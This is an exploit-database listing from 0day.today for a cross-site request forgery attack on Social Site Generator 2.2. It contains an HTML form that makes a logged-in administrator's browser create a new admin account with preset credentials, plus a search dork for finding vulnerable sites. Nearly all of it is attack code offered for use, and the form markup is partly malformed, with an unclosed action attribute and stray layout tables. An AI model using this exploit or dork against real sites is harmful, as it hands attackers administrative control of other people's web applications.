[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Social Site Generator 2.2 - CSRF Add Admin Exploit

Author
Fallaga
Risk
[
Security Risk Low
]
0day-ID
0day-ID-21101
Category
web applications
Date add
13-08-2013
Platform
php
# Exploit Title: social generator Remote Add Admin Exploit
# Date: 02/05/2013
# Author: Fallaga
#Script url:www.socialsitegeneratorscript.com
# Version: 2.2
# Tested on: Windows
# CVE : ()
# Dork: inurl:my_profile.php?user_id=MTM=
##################################################################################
 
 
<html>
<form method="post" action="
http://server/admin/edit_admin_user.php?eventid=10
 
                                    <td width="17%" align="left" nowrap
class="text"><strong>Username:</strong></td>
                                    <td width="83%"><table border="0"
cellspacing="0" cellpadding="2">
                                        <tr>
                                          <td nowrap align="left"><input
name="txt_username" type="text" value="JaMbA"/></td>
                                        </tr>
                                      </table></td>
 
                                  </tr>
  <tr>
                                    <td nowrap class="text"
align="left"><strong>Password:</strong></td>
                                    <td><table border="0" cellspacing="0"
cellpadding="2">
                                        <tr>
  <td nowrap align="left" class="text"><input name="txt_password"
type="password" value="abdotv"/></td>
                                        </tr>
                                      </table></td>
 
                                  </tr>
                                   <tr>
                                    <td nowrap class="text"
align="left"><strong>Confirm Password:</strong></td>
                                    <td><table border="0" cellspacing="0"
cellpadding="2">
                                        <tr>
  <td nowrap align="left" class="text"><input name="txt_cpassword"
type="password" value="abdotv"/></td>
                                        </tr>
                                      </table></td>
 
                                  </tr>
 
                                  <tr>
 
                                    <td></td>
                                  </tr>
 
                                  <tr>
 
 
 
 
 
 
                                  </tr>
                                  <tr>
 
                                    <td></td>
                                  </tr>
 
                                  <tr>
 
            </tr>
 
                                  <tr>
 
 
                                  </tr>
 
                                  <tr>
                                    <td valign="top"> </td>
                                    <td><table  border="0" cellspacing="0"
cellpadding="2">
                                        <tr>
 
                                          <td width="165" align="center">
                                          <input type="submit"
value="Submit" name="btn_submit" >
 </td>
                                          <td width="6"> </td>
                                        </tr>
                                      </table></td>
                                  </tr>
                                </table></td>
                            </tr>
 
                          </table></td>
                      </tr>
                    </table></td>
                </tr>
              </table>
            </form></td>
        </tr>
      </table></td>
  </tr>
 
  <tr>
    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="3%" align="left" background="images/layoutadmin_109.jpg"
style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
width="33" height="20" alt="" /></td>
        <td   background="images/layoutadmin_109.jpg"> </td>
        <td width="3%" align="right"
background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
><img src="images/layoutadmin_111.jpg" width="33"  height="20" alt=""/></td>
      </tr>
</table></td>
  </tr>
 
</table>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++
Greetz: FaLLAGa Gov TN

#  0day.today [2024-12-25]  #